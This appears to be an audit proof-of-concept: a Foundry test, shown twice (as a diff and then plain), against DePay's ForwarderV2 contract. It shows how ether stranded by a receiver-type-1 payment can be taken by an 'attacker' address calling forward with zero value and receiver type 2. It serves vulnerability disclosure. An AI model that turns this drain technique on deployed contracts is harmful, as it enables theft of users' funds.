Falilah · August 25, 2023 11:33
diff --git a/Depaypoc1.sol b/Depaypoc1.sol
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity ^0.8.13;

 import {Test, console} from 'forge-std/Test.sol';
 import {DePayForwarderV2} from '../contracts/DePayForwarderV2.sol';
 import {DePayRouterV2} from '../contracts/DePayRouterV2.sol';
 import {TestReceiver} from '../contracts/TestReceiver.sol';

 import {IDePayRouterV2} from '../contracts/interfaces/IDePayRouterV2.sol';

 contract DePayRouterV2Test is Test {
  DePayForwarderV2 public forwarder;
  DePayRouterV2 public router;
  TestReceiver receiver;
  address USDC = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;

  function setUp() public {
    forwarder = new DePayForwarderV2();
    router = new DePayRouterV2(address(0), address(forwarder));
    receiver = new TestReceiver();
  }

  function test_enable() public {
    router.enable(0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD, true);
    assert(router.exchanges(0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD) == true);
  }

 

  //This test for a condition where user pass in receiver type to be 1  to receive native token
  function testPayWhenReceivetypeis1() public {
    address NATIVE = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;
    uint paymentAmount = 5 ether;
    uint feeAmount = 0;
    uint amountIn = paymentAmount + feeAmount;
    address feeReceiver = makeAddr('feeReceiver');
    //setting up a payment struct for user who want to use native to pay native
    IDePayRouterV2.Payment memory payment = IDePayRouterV2.Payment(
      amountIn,
      false,
      paymentAmount,
      feeAmount,
      NATIVE,
      address(0),
      NATIVE,
      0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7,
      feeReceiver,
      0,
      1,
      '',
      '0x4589000',
      block.timestamp + 7 days
    );
    // loging the information of the addresses before making transaction
    uint paymentReceiver = 0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7.balance;
    console.log(paymentReceiver);

    uint forwarderbalance = address(forwarder).balance;
    //pranking a user with eth on mainnet
    vm.startPrank(0x267be1C1D684F78cb4F6a176C4911b741E4Ffdc0);
    // ether sent along with the transaction is 5 ether
    forwarder.forward{value: 5 ether}(payment);
    vm.stopPrank();

    console.log(forwarderbalance, address(forwarder).balance);
 // get an attacker address  to withdraw the stuck funds
    address attacker = makeAddr('attacker');
    uint attacker_ = attacker.balance;
    console.log(paymentReceiver, 0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7.balance);
    console.log(attacker_, attacker.balance);
    console.log(forwarderbalance, address(forwarder).balance);
 //restructured the payment struct to a different payment receiveraddress and change the receiver type to 2
    IDePayRouterV2.Payment memory payment2 = IDePayRouterV2.Payment(
      amountIn,
      false,
      paymentAmount,
      feeAmount,
      NATIVE,
      address(0),
      NATIVE,
      attacker,
      feeReceiver,
      0,
      2,
      '',
      '0x4589000',
      block.timestamp + 7 days
    );
    vm.prank(attacker);
  //call the forward function with 0 ether
    forwarder.forward{value: 0 ether}(payment2);

    console.log(paymentReceiver, 0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7.balance);
    console.log(attacker_, attacker.balance);
    console.log(forwarderbalance, address(forwarder).balance);
  }
 }
	// SPDX-License-Identifier: UNLICENSED
	pragma solidity ^0.8.13;

	import {Test, console} from 'forge-std/Test.sol';
	import {DePayForwarderV2} from '../contracts/DePayForwarderV2.sol';
	import {DePayRouterV2} from '../contracts/DePayRouterV2.sol';
	import {TestReceiver} from '../contracts/TestReceiver.sol';

	import {IDePayRouterV2} from '../contracts/interfaces/IDePayRouterV2.sol';

	contract DePayRouterV2Test is Test {
	DePayForwarderV2 public forwarder;
	DePayRouterV2 public router;
	TestReceiver receiver;
	address USDC = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;

	function setUp() public {
	forwarder = new DePayForwarderV2();
	router = new DePayRouterV2(address(0), address(forwarder));
	receiver = new TestReceiver();
	}

	function test_enable() public {
	router.enable(0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD, true);
	assert(router.exchanges(0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD) == true);
	}



	//This test for a condition where user pass in receiver type to be 1 to receive native token
	function testPayWhenReceivetypeis1() public {
	address NATIVE = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;
	uint paymentAmount = 5 ether;
	uint feeAmount = 0;
	uint amountIn = paymentAmount + feeAmount;
	address feeReceiver = makeAddr('feeReceiver');
	//setting up a payment struct for user who want to use native to pay native
	IDePayRouterV2.Payment memory payment = IDePayRouterV2.Payment(
	amountIn,
	false,
	paymentAmount,
	feeAmount,
	NATIVE,
	address(0),
	NATIVE,
	0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7,
	feeReceiver,
	0,
	1,
	'',
	'0x4589000',
	block.timestamp + 7 days
	);
	// loging the information of the addresses before making transaction
	uint paymentReceiver = 0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7.balance;
	console.log(paymentReceiver);

	uint forwarderbalance = address(forwarder).balance;
	//pranking a user with eth on mainnet
	vm.startPrank(0x267be1C1D684F78cb4F6a176C4911b741E4Ffdc0);
	// ether sent along with the transaction is 5 ether
	forwarder.forward{value: 5 ether}(payment);
	vm.stopPrank();

	console.log(forwarderbalance, address(forwarder).balance);
	// get an attacker address to withdraw the stuck funds
	address attacker = makeAddr('attacker');
	uint attacker_ = attacker.balance;
	console.log(paymentReceiver, 0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7.balance);
	console.log(attacker_, attacker.balance);
	console.log(forwarderbalance, address(forwarder).balance);
	//restructured the payment struct to a different payment receiveraddress and change the receiver type to 2
	IDePayRouterV2.Payment memory payment2 = IDePayRouterV2.Payment(
	amountIn,
	false,
	paymentAmount,
	feeAmount,
	NATIVE,
	address(0),
	NATIVE,
	attacker,
	feeReceiver,
	0,
	2,
	'',
	'0x4589000',
	block.timestamp + 7 days
	);
	vm.prank(attacker);
	//call the forward function with 0 ether
	forwarder.forward{value: 0 ether}(payment2);

	console.log(paymentReceiver, 0xb12d5059F46a41D82e435fDda8Dc4010d6281fF7.balance);
	console.log(attacker_, attacker.balance);
	console.log(forwarderbalance, address(forwarder).balance);
	}
	}